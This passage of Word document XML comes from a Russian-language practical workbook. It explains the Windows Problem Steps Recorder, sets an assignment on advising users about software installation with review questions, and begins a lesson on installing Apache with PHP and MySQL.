            <wp:docPr id="25312" name="Рисунок 176" descr="http://kompkimi.ru/wp-content/uploads/2012/06/Problem-Steps-Recorder-will-record.pn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kompkimi.ru/wp-content/uploads/2012/06/Problem-Steps-Recorder-will-record.png">
                      <a:hlinkClick r:id="rId432"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId433" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3152802" cy="483103"/>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Однако, она не записывает то, что вы вводите как тип. Для того чтобы добавить данные в запись о том, что вы уже набрали, вам необходимо нажать на кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавить Комментарий</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> на соответствующем шаге, а затем добавить комментарии в поле </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выделить Проблему и Комментарий</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Как только вы закончите ввод, нажмите </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и запись продолжится.</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1773750" cy="859530"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25313" name="Рисунок 177" descr="http://kompkimi.ru/wp-content/uploads/2012/06/continue-recording.png">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kompkimi.ru/wp-content/uploads/2012/06/continue-recording.png">
                      <a:hlinkClick r:id="rId434"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId435" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1775799" cy="860523"/>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Для приостановки записи нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пауза Записи</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Вы сможете вернуться к ней в любое время. Однако, если вы нажали </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Остановить Запись</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, запись остановиться и вы не сможете продолжить.</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В Windows 7, как только вы остановите запись, вам будет предложено сохранить его в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>файл. В Windows 8, вы можете просматривать записи до их сохранения.</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2335350" cy="826139"/>
            <wp:effectExtent l="19050" t="0" r="7800" b="0"/>
            <wp:docPr id="25314" name="Рисунок 178" descr="http://kompkimi.ru/wp-content/uploads/2012/06/review-recording.png">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kompkimi.ru/wp-content/uploads/2012/06/review-recording.png">
                      <a:hlinkClick r:id="rId436"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId437" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2335210" cy="826089"/>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i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> файл содержит </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MHTML документ</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,который вы можете просматривать в Internet Explorer или Microsoft Word.</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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основная разница между Windows 7 и Windows 8</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Есть некоторые различия между Windows 7 и Windows 8 версий этого приложения. В Windows 7 можно просматривать записи в браузере только после извлечения </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.zip</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> файла.</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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2248950" cy="1576732"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25315" name="Рисунок 179" descr="http://kompkimi.ru/wp-content/uploads/2012/06/extract-the-.zip-file.png">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kompkimi.ru/wp-content/uploads/2012/06/extract-the-.zip-file.png">
                      <a:hlinkClick r:id="rId438"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId439" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2252891" cy="1579495"/>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В Windows 8, после остановки записи, вы можете просмотреть его в </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и выбрать сохранить и отправить его только после того, как вы удовлетворены.</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noProof/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1665750" cy="1116828"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25316" name="Рисунок 180" descr="http://kompkimi.ru/wp-content/uploads/2012/06/recording-stopped.png">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kompkimi.ru/wp-content/uploads/2012/06/recording-stopped.png">
                      <a:hlinkClick r:id="rId440"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId441" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1665923" cy="1116944"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Хотя на первый взгляд, это может показаться не таким и большим изменением,но именно это изменение делает инструмент гораздо более удобным в использовании.</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b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Когда использовать Steps Recorder?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Приложение </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Problem Steps Recorder</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> может быть полезно в нескольких случаях:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:right="-2" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если вы хотите, чтобы записывать проблемы, которые у вас возникли, и делиться подробностями с кем-то, кто может вам помочь. Например, вы можете делать записи и загружать их в Интернете и поделиться ими с другом или вашим администратором сети, когда вы хотите что бы вам помогли.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:right="-2" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Записывать то, что вы делаете, не необходимые для поиска и устранения неисправностей. Например, вы можете записать весь учебник с этим инструментом и поделиться им с другими, так, чтобы они могли следовать за ним при необходимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="182" w:name="_Toc495578202"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 3. Консультирование пользователей по вопросам установки и настройки программного обеспечения в модельной ситуации.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="182"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Требования к отчету</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Отчет, в котором содержатся рекомендации по установке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимательно ознакомиться с подробным алгоритмом установки программного продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На основе прочитанного документа выработать краткие рекомендации по установке ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание: Выработать рекомендации по безопасной и эффективной инсталляции программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Когда использовать Steps Recorder?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Какова цель консультирования пользователей?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Какие риски несет обновление программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0139B" w:rsidRPr="00617AC0" w:rsidRDefault="00B0139B" w:rsidP="00B0139B">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Какие риски несет отказ от обновления программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="00607C3B">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc495578205"/>
      <w:bookmarkStart w:id="184" w:name="_Toc26278740"/>
      <w:bookmarkStart w:id="185" w:name="_Toc507786843"/>
      <w:bookmarkStart w:id="186" w:name="_Toc507788234"/>
      <w:bookmarkStart w:id="187" w:name="_Toc507788504"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 21 Обслуживание серверного программного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
      <w:bookmarkEnd w:id="184"/>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков установки и настройки программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание: Установка и настройка серверного программного обеспечения: Apache с установленными модулями PHP и MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Итак, что же такое Apache? Это полнофункциональный, расширяемый веб-сервер, полностью поддерживающий протокол HTTP/1.1 и распространяющийся с открытым исходным кодом. Сервер может работать практически на всемх распространенных платформах. Существуют готовые исполняемые файлы сервера для Windows NT, Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9x, OS/2, Netware 5.x и нескольких UNIX-систем. При этом он очень прост в установке и конфигурации. В этом вы сможете убедиться несколько позднее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache настраивается с помощью текстовых конфигурационных файлов. Основные параметры уже настроены «по умолчанию» и будут работать в большинстве случаев. Если вам не хватает функциональности штатного «Апача», то стоит присмотреться к распространяемым модулям, написанным Apache Group и сторонними разработчиками. Немаловажным преимуществом является то, что создатели активно общаются с пользователями и реагируют на все сообщения об ошибках.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Самая простая функция, которую может выполнять Apache – стоять на сервере и обслуживать обычный HTML-сайт. При получении запроса на определенную страницу сервер отправляет в ее ответ браузеру. Набираете адрес, открывается страница — все просто.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Функция сложнее, которая заложена в протоколе HTTP/1.1 – аутентификация пользователей. С помощью штатных средств сервера Apache вы можете разграничить доступ к определенным страницам сайта для разных пользователей. Это нужно, например, для того чтобы сделать администраторский интерфейс к сайту. Для этого используются файлы .htaccess и .htpasswd, а также модули mod_auth и mod_access. Пользователи могут быть разбиты на группы, и для каждой из них можно назначить свои права доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для разделения дизайна и функциональной части сайта, а также для упрощения изменения статических объектов существует технология SSI*. Она позволяет вам поместить всю повторяющуюся информацию в один файл (например, top.inc), а затем вставлять в страницы ссылку на нее. Затем, если понадобится изменить несколько строк в этой информации, то придется поменять их только в одном файле. Сервер Apache поддерживает эту технологию и позволяет использовать серверные включения в полном объеме.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
